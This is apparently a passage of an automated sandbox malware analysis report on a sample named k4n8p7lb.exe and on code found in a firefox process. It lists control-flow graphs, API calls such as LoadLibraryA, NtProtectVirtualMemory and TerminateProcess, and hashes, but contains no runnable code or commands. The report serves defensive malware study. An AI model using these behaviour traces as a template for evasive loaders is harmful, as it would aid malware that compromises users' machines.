118->126 127 20622241196-206222411bf call 20622241412 119->127 128 206222411c5-20622241204 119->128 123 20622241212-20622241219 120->123 124 20622241294-20622241297 120->124 131 2062224124a-2062224128f 123->131 132 2062224121b-20622241244 call 20622241412 123->132 124->65 133 2062224129d-206222412a4 124->133 126->110 127->97 127->128 143 20622241364-20622241379 128->143 131->143 132->97 132->131 139 206222412cc-206222412d3 133->139 140 206222412a6-206222412c6 call 20622241412 133->140 137->67 141 206222412fb-20622241305 139->141 142 206222412d5-206222412f5 call 20622241412 139->142 140->139 141->97 149 20622241307-2062224130e 141->149 142->141 143->67 149->97 152 20622241310-20622241356 149->152 152->143
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000018.00000002.28537972227.0000020622190000.00000040.00020000.sdmp, Offset: 0000020622190000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_24_2_20622190000_firefox.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID: `
                                                                                                                                                      • API String ID: 823142352-2679148245
                                                                                                                                                      • Opcode ID: d77668096b18891c3cee839e8581402439719b55f2a783575009bfdf60917714
                                                                                                                                                      • Instruction ID: 0a049f45cf2823c351f08bbeb0ac58cbebeb62bcb1b7097737ee552ac387ffab
                                                                                                                                                      • Opcode Fuzzy Hash: d77668096b18891c3cee839e8581402439719b55f2a783575009bfdf60917714
                                                                                                                                                      • Instruction Fuzzy Hash: 71224F70618B0ADFDB99DF28C48D7ADB7E1FB58300F50422AD85ED7291DB31A661CB81
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 0000020622242762, Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 156 20622242762-2062224276e call 20622243802 159 2062224277c-20622242784 call 20622243802 156->159 160 20622242770-2062224277b call 2062223ff12 156->160 165 20622242786-20622242787 159->165 166 2062224278f-20622242797 call 20622243802 159->166 165->166 169 2062224279d-206222427ad call 2062223e1a2 166->169 170 20622242904-2062224290a 166->170 173 206222427b3-206222427ba 169->173 174 206222428ff-20622242900 169->174 173->174 175 206222427c0-206222427de call 20622242942 call 2062223e0a2 173->175 174->170 175->174 180 206222427e4-206222427ee call 2062223a362 175->180 180->174 183 206222427f4-20622242802 180->183 184 20622242808-2062224280b 183->184 185 206222428a4-206222428ac 183->185 188 2062224281a-2062224281d 184->188 189 2062224280d-20622242815 call 206222408a2 184->189 186 206222428fa-206222428fb 185->186 187 206222428ae-206222428b5 call 20622242742 185->187 186->174 187->186 197 206222428b7-206222428c9 call 20622242742 187->197 188->185 190 20622242823-20622242826 188->190 189->185 190->185 194 20622242828-2062224282b 190->194 194->185 196 2062224282d-20622242847 call 206222394b2 call 206222408a2 194->196 206 20622242849-20622242854 call 20622242742 196->206 207 20622242894-2062224289f call 2062223b302 call 20622239372 196->207 197->186 203 206222428cb-206222428f8 call 2062223c812 call 20622241412 ExitProcess 197->203 206->207 216 20622242856-2062224285d 206->216 207->185 216->207 217 2062224285f-20622242893 call 2062223f4e2 call 20622242942 216->217
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000018.00000002.28537972227.0000020622190000.00000040.00020000.sdmp, Offset: 0000020622190000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_24_2_20622190000_firefox.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: d1e992e853f5319a5e44a433e2df559e407adb8b6d37870ff715de64f33b6fb3
                                                                                                                                                      • Instruction ID: 40705fe0112b0059880139463e622ebc829e3e1b9cdd51a1a08f572898a57d01
                                                                                                                                                      • Opcode Fuzzy Hash: d1e992e853f5319a5e44a433e2df559e407adb8b6d37870ff715de64f33b6fb3
                                                                                                                                                      • Instruction Fuzzy Hash: 3B417530616B06EEFBA8FB29448D7ED62D1FF54300FD406299C0BC61D3DEA6DA61C661
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 000002062223F4E2, Relevance: 1.6, APIs: 1, Instructions: 53libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000018.00000002.28537972227.0000020622190000.00000040.00020000.sdmp, Offset: 0000020622190000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_24_2_20622190000_firefox.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Load
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                                      • Opcode ID: e15ec73648a025ceb5b3a15fe8fd4bd4c46c9f3de2ee994074a413c48c56ecde
                                                                                                                                                      • Instruction ID: 3bcf8f073df5a87f8e28072db485fd45547ca76756a8050d859c5ed449438cd0
                                                                                                                                                      • Opcode Fuzzy Hash: e15ec73648a025ceb5b3a15fe8fd4bd4c46c9f3de2ee994074a413c48c56ecde
                                                                                                                                                      • Instruction Fuzzy Hash: A901B531109B098FE754EB25D88D7E772D1FBE8304F44052A684EC6192EE36D751C641
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Analysis Process: k4n8p7lb.exe PID: 5096 Parent PID: 4528 k4n8p7lb.exeCOMMON

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:7.5%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                      Total number of Nodes:112
                                                                                                                                                      Total number of Limit Nodes:0

                                                                                                                                                      Graph

                                                                                                                                                      execution_graph 1045 2bcc3fe GetPEB 1059 2bd073f 1060 2bd0744 1059->1060 1060->1059 1061 2bd01bf GetPEB 1060->1061 1063 2bd07f7 1060->1063 1062 2bd1465 1061->1062 975 2bc3c3f 976 2bcc311 TerminateProcess 975->976 978 2bc2536 979 2bc2563 978->979 982 2bd1dff 979->982 984 2bd1d93 982->984 986 2bd2897 984->986 985 2bc25fa 987 2bd2909 NtProtectVirtualMemory 986->987 987->985 1037 2bc0590 1038 2bcf7b6 3 API calls 1037->1038 1039 2bc05ab 1038->1039 988 2bc66ad 989 2bcec5f 988->989 992 2bcdca2 989->992 993 2bcdcd1 992->993 1000 2bcf7b6 993->1000 995 2bcdd2a 996 2bcf7b6 3 API calls 995->996 997 2bcdd44 996->997 1010 2bcdd54 997->1010 1007 2bc146e 1000->1007 1001 2bcf8ba LoadLibraryA 1002 2bcf91f 2 API calls 1001->1002 1004 2bcf8ca 1002->1004 1004->995 1005 2bcf893 1018 2bcf91f 1005->1018 1007->1000 1007->1001 1016 2bd01bf GetPEB 1007->1016 1009 2bd3d15 1009->995 1011 2bcdd84 1010->1011 1012 2bcf7b6 3 API calls 1011->1012 1013 2bcdd98 1012->1013 1014 2bcf7b6 3 API calls 1013->1014 1015 2bcddb1 1014->1015 1017 2bd01e1 1016->1017 1017->1005 1020 2bcf967 1018->1020 1021 2bcf8a3 1020->1021 1022 2bcfae6 1020->1022 1021->1001 1021->1009 1023 2bc146e 1022->1023 1024 2bcf8ba LoadLibraryA 1023->1024 1026 2bd01bf GetPEB 1023->1026 1032 2bcfd11 1023->1032 1025 2bcf91f GetPEB 1024->1025 1027 2bcf8ca 1025->1027 1028 2bcf893 1026->1028 1027->1020 1029 2bcf91f GetPEB 1028->1029 1030 2bcf8a3 1029->1030 1030->1024 1031 2bd3d15 1030->1031 1031->1020 1032->1020 1041 2bc0c8e 1042 2bce4b8 1041->1042 1043 2bcdd54 3 API calls 1042->1043 1044 2bce512 1043->1044 1046 2bc62c4 1049 2bcf1c0 1046->1049 1048 2bc62ca 1050 2bc146e 1049->1050 1050->1048 1051 2bcf8ba LoadLibraryA 1050->1051 1053 2bd01bf GetPEB 1050->1053 1052 2bcf91f 2 API calls 1051->1052 1054 2bcf8ca 1052->1054 1055 2bcf893 1053->1055 1054->1048 1056 2bcf91f 2 API calls 1055->1056 1057 2bcf8a3 1056->1057 1057->1051 1058 2bd3d15 1057->1058 1058->1048 1071 2bcd961 1072 2bcd979 1071->1072 1075 2bcd981 1072->1075 1076 2bcd98a 1075->1076 1079 2bcd9e4 1076->1079 1080 2bcd9ed 1079->1080 1081 2bcf7b6 3 API calls 1080->1081 1082 2bcda14 1081->1082 1083 2bcf7b6 3 API calls 1082->1083 1084 2bcda2c 1083->1084 1085 2bcf7b6 3 API calls 1084->1085 1086 2bcda46 1085->1086 1087 2bcf7b6 3 API calls 1086->1087 1088 2bcda5e 1087->1088 1089 2bcf7b6 3 API calls 1088->1089 1090 2bcdab8 1089->1090 1091 2bcf7b6 3 API calls 1090->1091 1092 2bcdad8 1091->1092 1093 2bcf7b6 3 API calls 1092->1093 1094 2bcdaf9 1093->1094 1095 2bcf7b6 3 API calls 1094->1095 1096 2bcdb10 1095->1096 1097 2bcf7b6 3 API calls 1096->1097 1098 2bcdb28 1097->1098 1099 2bcf7b6 3 API calls 1098->1099 1100 2bcdb90 1099->1100 1101 2bcf7b6 3 API calls 1100->1101 1102 2bcdbb9 1101->1102 1103 2bcf7b6 3 API calls 1102->1103 1104 2bcdbde 1103->1104 1105 2bcf7b6 3 API calls 1104->1105 1106 2bcdbfb 1105->1106 1107 2bcf7b6 3 API calls 1106->1107 1108 2bcdc0d 1107->1108 1109 2bcf7b6 3 API calls 1108->1109 1110 2bcdc62 1109->1110 1111 2bcf7b6 3 API calls 1110->1111 1112 2bcdc78 1111->1112 1113 2bcf7b6 3 API calls 1112->1113 1114 2bcdc8f 1113->1114 1115 2bcdca2 3 API calls 1114->1115 1116 2bcde3f 1115->1116

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 02BCFAE6, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 205libraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNELBASE(1B54ED57), ref: 02BCF8BC
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000019.00000002.28964217531.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_25_2_2bc0000_k4n8p7lb.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                      • String ID: wEj
                                                                                                                                                      • API String ID: 1029625771-1518881957
                                                                                                                                                      • Opcode ID: 79d5da4b2b0fe70a851aaafd7e00bc9962a1e194395f7ca7e8bd450ee45efaf8
                                                                                                                                                      • Instruction ID: a033f93cd9327fbf42a49b6a505d562c6ba6453b336bd7dd6d4863a57d1a2d28
                                                                                                                                                      • Opcode Fuzzy Hash: 79d5da4b2b0fe70a851aaafd7e00bc9962a1e194395f7ca7e8bd450ee45efaf8
                                                                                                                                                      • Instruction Fuzzy Hash: F7613B757013865FEF349E748DB43EA36535F633A0FA842AECC864B284DB758585CB01
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02BD2897, Relevance: 1.5, APIs: 1, Instructions: 37nativeCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 87 2bd2897-2bd2955 NtProtectVirtualMemory
                                                                                                                                                      APIs
                                                                                                                                                      • NtProtectVirtualMemory.NTDLL ref: 02BD2953
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000019.00000002.28964217531.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_25_2_2bc0000_k4n8p7lb.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MemoryProtectVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2706961497-0
                                                                                                                                                      • Opcode ID: 6f349eab1bd50ee41d0713d4066b3ebe85f2ee296e5245aba208eaf3b4163246
                                                                                                                                                      • Instruction ID: 22cb26ee4d1611cb1f560478dd3e01f49a014cee65e1b918811eec5b55f9eee8
                                                                                                                                                      • Opcode Fuzzy Hash: 6f349eab1bd50ee41d0713d4066b3ebe85f2ee296e5245aba208eaf3b4163246
                                                                                                                                                      • Instruction Fuzzy Hash: C00169B02482859FEB28DE28DD487EAB7E7AFD4300F45842DAC899B204C774AE45CA15
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02BCF7B6, Relevance: 1.6, APIs: 1, Instructions: 109libraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNELBASE(1B54ED57), ref: 02BCF8BC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000019.00000002.28964217531.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_25_2_2bc0000_k4n8p7lb.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                      • Opcode ID: 6055108f14356415309691eb745a2ea7a28b7d12781b243f7414ba6239b4bec7
                                                                                                                                                      • Instruction ID: 1fcfe82a3cf65b3437fcb80c44781e03d1ba880334e05b3dd24934ade48d2cb5
                                                                                                                                                      • Opcode Fuzzy Hash: 6055108f14356415309691eb745a2ea7a28b7d12781b243f7414ba6239b4bec7
                                                                                                                                                      • Instruction Fuzzy Hash: 58314676A80248DFDB289E64DC943D93BA3AF973A0F3801ADDC459B200D7308986CB41
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02BCF1C0, Relevance: 1.6, APIs: 1, Instructions: 99libraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNELBASE(1B54ED57), ref: 02BCF8BC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000019.00000002.28964217531.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_25_2_2bc0000_k4n8p7lb.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                      • Opcode ID: 4f91dfbece1ff6794ba06878d21295aa9d0399695df0a3c38650988de6523a9b
                                                                                                                                                      • Instruction ID: bfd98e146032348ff51c58a93f9a397a8ce23c16f79b2abb08b4955542e36477
                                                                                                                                                      • Opcode Fuzzy Hash: 4f91dfbece1ff6794ba06878d21295aa9d0399695df0a3c38650988de6523a9b
                                                                                                                                                      • Instruction Fuzzy Hash: C5310F36B443499FDF349E249D947EA37A7AF967A0F64016EDC4A9B200D3318A46CB41
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 02BC3C3F, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 83 2bc3c3f-2bcc3f9 TerminateProcess
                                                                                                                                                      APIs
                                                                                                                                                      • TerminateProcess.KERNELBASE(-2F895780,F9BA47BC,C5C0FA4A,?,00000026), ref: 02BCC3EA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000019.00000002.28964217531.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_25_2_2bc0000_k4n8p7lb.jbxd
                                                                                                                                                      Yara matches
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProcessTerminate
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 560597551-0
                                                                                                                                                      • Opcode ID: 91b30195c643c00ee6a6d4a07179dd351b1ee76ae2e9908f9315fe9a3e118d0c
                                                                                                                                                      • Instruction ID: 1dbd8f746af16a849e0d299d8e3a7459854aed502779eaabd0c29666e599f833
                                                                                                                                                      • Opcode Fuzzy Hash: 91b30195c643c00ee6a6d4a07179dd351b1ee76ae2e9908f9315fe9a3e118d0c
                                                                                                                                                      • Instruction Fuzzy Hash: 28F02870244782CFCB308E648DE5BDE27665FCA244F90D16DDD494A14AD3350980C606
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Analysis Process: k4n8p7lb.exe PID: 3200 Parent PID: 5888 k4n8p7lb.exeCOMMON

                                                                                                                                                      Execution Graph

                                                                                                                                                      Execution Coverage:0%
                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                      Total number of Nodes:9
                                                                                                                                                      Total number of Limit Nodes:1

                                                                                                                                                      Graph

                                                                                                                                                      execution_graph 79966 573a84 79967 573a8b 79966->79967 79967->79966 79968 573a5a TerminateThread 79967->79968 79969 573a71 79967->79969 79968->79969 79978 1e8f2b20 79980 1e8f2b2a 79978->79980 79981 1e8f2b3f LdrInitializeThunk 79980->79981 79982 1e8f2b31 79980->79982 79986 1e8f29f0 LdrInitializeThunk

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 1E8F34E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: b73b196f8d6b195a16686c31ff40ee3613791950e5312dbcce9f553fb39e7532
                                                                                                                                                      • Instruction ID: 3913ffb1fe9d8d599cac7747ae93cb5086c55f435a4f89ac06b1f09a5a83deed
                                                                                                                                                      • Opcode Fuzzy Hash: b73b196f8d6b195a16686c31ff40ee3613791950e5312dbcce9f553fb39e7532
                                                                                                                                                      • Instruction Fuzzy Hash: 3290023170560402D510A159461474A505947D0701FE1C919A4518D28DC7A5895179A2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2EB0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 88fd6c9de44fb72efa7e9f7265ee54093d383d513705c5d4a0a2068e80adbb17
                                                                                                                                                      • Instruction ID: fc3192315acec6bd124f44b7ccf4842f654bf0b2b02bc553667b7fb4015ac7e1
                                                                                                                                                      • Opcode Fuzzy Hash: 88fd6c9de44fb72efa7e9f7265ee54093d383d513705c5d4a0a2068e80adbb17
                                                                                                                                                      • Instruction Fuzzy Hash: E790023130190402D510A159491474F405947D0702FD1C519A5258D15DC63588517971
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2ED0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 2c04b6a548bb081448583b27eb85d4f77c3361fc09572b050241ba3206bcd828
                                                                                                                                                      • Instruction ID: c229757afbc08cb861b9a433bf2d4646d3d44038f2b20d48e84fc0771fe3f22a
                                                                                                                                                      • Opcode Fuzzy Hash: 2c04b6a548bb081448583b27eb85d4f77c3361fc09572b050241ba3206bcd828
                                                                                                                                                      • Instruction Fuzzy Hash: 49900231701500424550B169894494A80596BE17117D1C629A4A8CD10DC56988656A65
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2E50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 973e47f33a5af327bb4c05ef00d0f000f8761aa20ca0ed193a5b50d92bb5ea3e
                                                                                                                                                      • Instruction ID: 6f410dffa3302cff3b83860d36e2fcec3011bcfaab951589bf0e5c1d7217709f
                                                                                                                                                      • Opcode Fuzzy Hash: 973e47f33a5af327bb4c05ef00d0f000f8761aa20ca0ed193a5b50d92bb5ea3e
                                                                                                                                                      • Instruction Fuzzy Hash: E990027134150442D510A1594514B4A405987E1701FD1C51DE5158D14DC629CC527526
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2F00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: faf1d9b54e5bc383c84c6af35ed9f3dccb39e4457b13183b0da15d0d48a407fc
                                                                                                                                                      • Instruction ID: 01c156506c63684d655ef95a2344770b306a3f6baed16c291f0652bbf7a8a76e
                                                                                                                                                      • Opcode Fuzzy Hash: faf1d9b54e5bc383c84c6af35ed9f3dccb39e4457b13183b0da15d0d48a407fc
                                                                                                                                                      • Instruction Fuzzy Hash: ED900231311D0042D610A5694D14B4B405947D0703FD1C61DA4248D14CC92588616921
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2CF0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 17edecefd54734d167448389fdb318cc658beaefaf543e2b71372a2d53da04d1
                                                                                                                                                      • Instruction ID: 487471a6aa0da6216f5802d91d96a7235c37ea1fa1e6975287abdd5d52ff4823
                                                                                                                                                      • Opcode Fuzzy Hash: 17edecefd54734d167448389fdb318cc658beaefaf543e2b71372a2d53da04d1
                                                                                                                                                      • Instruction Fuzzy Hash: 74900231342541525955F159450454B805A57E07417D1C51AA5508D10CC5369856EA21
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2C30, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 206 1e8f2c30-1e8f2c3c LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1e880000_k4n8p7lb.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                      • Opcode ID: 671ccd263b5ffefbfcc9a5ead14c9d9c8fd07af57e899fce6f169a342502d5af
                                                                                                                                                      • Instruction ID: bb4cbd1612fd5ac574f34cc7a06d1ac11a8a4f528c958516ec854e2d6fc9a057
                                                                                                                                                      • Opcode Fuzzy Hash: 671ccd263b5ffefbfcc9a5ead14c9d9c8fd07af57e899fce6f169a342502d5af
                                                                                                                                                      • Instruction Fuzzy Hash: 7890023931350002D590B159550864E405947D1702FD1D91DA4109D18CC92588696721
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1E8F2C50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 207 1e8f2c50-1e8f2c5c LdrInitializeThunk
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.29309726512.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true
                                                                                                                                                      • Associated: 0000001A.00000002.29311053574.000000001E9A9000.00000040.00000001.sdmp Download File
                                                                                                                                                      • Associated: 0000001A.00000002.29311202952.000000001E9AD000.00000040.00000001.sdmp Download File
                                                                                                                                                      Joe Sandbox IDA Plugin
